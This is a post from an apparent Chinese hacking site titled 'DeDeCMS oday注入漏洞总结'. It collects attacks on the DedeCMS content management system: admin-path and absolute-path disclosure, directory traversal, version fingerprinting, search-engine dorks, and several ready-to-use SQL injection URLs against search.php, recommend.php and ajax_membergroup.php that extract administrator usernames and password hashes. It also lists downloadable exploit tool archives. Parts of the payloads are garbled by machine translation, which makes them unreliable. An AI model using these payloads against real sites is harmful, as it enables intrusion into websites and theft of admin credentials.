1.include /对话框/ select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,管理无需
员帐号,新版本的就直接转向了后台。
2.include / dialog / config.php会爆出后台管理路径
3.include / dialog / select_soft.php?activepath = / include / FCKeditor跳转目录
4.include / dialog / select_soft.php?activepath = / st0pst0pst0pst0pst0pst0pst0pst0p爆出网站绝对路径。
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
到根目录去。不过这些版本的访问地址有些不同。
地址为require / dialog / select_soft.php?activepath = /。/。/。/。/。/。/。/。/
include \ dialog \目录下的另外几个文件都存在同一个问题,只是默认设的目录不同。有些可以查看HTML这些文件哦..
存在相同问题的文件还有
include \ dialog \ select_images.php
include \ dialog \ select_media.php
include \ dialog \ select_templets.php
找版本:/data/admin/ver.txt
/data/mysql_error_trace.inc
/data/mysqli_error_trace.inc
googel
inurl:?dopost = showad
site:www.xxx.com inurl:login.php?gotopage =
爆路径/ plus / carbuyaction .php?dopost = return&code = bank
/plus/carbuyaction.php?dopost=return&code=cod/Include/payment/alipay.php
/Include/payment/yeepay.php
201210305.7SP或5.7
201206215.7SP1或5.7或5.6
201204305.7SP或5.7或5.6
201207095.6
201112055.7.18
20111111v57或v56或
v55 20080307v3或v4或v 5
20080324v5以上
200812185.1sp
201008035.6
20081009v5.1sp
200808075.1或5.2
201010215.3
200909125.5
201211075.7
201112095.6
200908105.5
/ plugins
/plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3, 4,5,6,7,8,9,10,用户ID,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,PWD,28来自+`%23 @__ admin`的29,30,31,32,33,34,35,36,37,38,39,40,41,42 +%23 @`\'`+] = a
/ plus / search .PHP?关键字= AS&typeArr [111%3D @'\'`)+联盟+选择+ 1,2,3,4,5,6,7,8,9,10,用户ID,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,PWD,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41,42 + from +`%23 @__ admin`%23 @`\'`+] = a
/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+ FROM +(选择+ COUNT(*),的concat(地板(兰特(0)* 2),(子串((从+'%23 @__ admin` +极限+ 0选择+ CONCAT(0x7c,用户ID,0x7c,PWD)+, 1),1,62)))a + from + information_schema.tables + group + by + a)b)%23 @`\'`+] = a
/plus/recommend.php?aid=1&_FILES [type] [名称]&_ FILES [type] [size]&_ FILES
[type] [type]&_ FILES [type] [tmp_name] = aa \'和+ char(@`'`)+ / *!50000Un
ion * / + / *!50000SeLect * / + 1,2,3,共 ncat(0x3C6162633E,group_conc
在(0x7C,userid,0x3a,pwd,0x7C),0x3C2F6162633E),5,6,7,8,9%20从%20`%23 @__ admin`%23
------- ------------------------------------
提交/plus/search.php?keyword=as&typeArr [uNion] = a
看结果如果提示
安全提示:请求错误步骤2!
那么直接用下面的exp
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1, 2,3,4,5,6,7,8,9,10,用户ID,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, PWD,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 +从+`%23 @__ admin`%23 @'\'`+] =一
看到结果如果提示
安全提示:请求错误步骤1!
那么直接用下面的exp
xx.com/plus/search.php?keyword=as&typeArr [111%3D @`\'`)+和+(SELECT + 1 + FROM +选择+ COUNT(*),的concat(地板(兰特(0)* 2),(子串((选择+ CONCAT(0x7c,用户ID,0x7c,PWD)+从+'%23 @__ admin` +极限+ 0,1) ,1,62)))a + from + information_schema.tables + group + by + a)b)%23 @`\'`+] = a
___________________
会员注入
织梦CMS5.7注入
2012.05.12 没有评论
①注入漏洞。
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面
然后写上语句
查看管理员帐号
/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23 @__ admin`%20where%201%20or%20id = @`'`
查看管理员密码
/部件/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@
Dede+v5.7+feedback.php-12-10-31.zipDedeCms buy_action SQL利用工具.zip
dedecms recommend.php注入利用工具.rarDeDeCMS v5.7暴密码exp.rar
dedecms v55漏洞利用.zipDeDECMS5.7 Inc 漏洞.rar
dedecms上传ODAY.zipdede爆菊.zip
dede注入导出.zip织梦(dedecms)全版本注入工具.zip
exp.zip
本文标题:DeDeCMS oday注入漏洞总结
本文作者:白蚂蚁
本文来自:蚁安黑客官网
转载请注明本文链接:http://www.mayidui.net/t623-1.html
DeDeCMS oday注入漏洞总结
2017-06-20 05:34:24
62954
2017-06-20 05:34:24
黑客附件
-
上传日期:2017-06-20 05:38文件大小:26KB 下载次数:6
6666666666
666
6666666
应该用不了了吧,版本好像有点低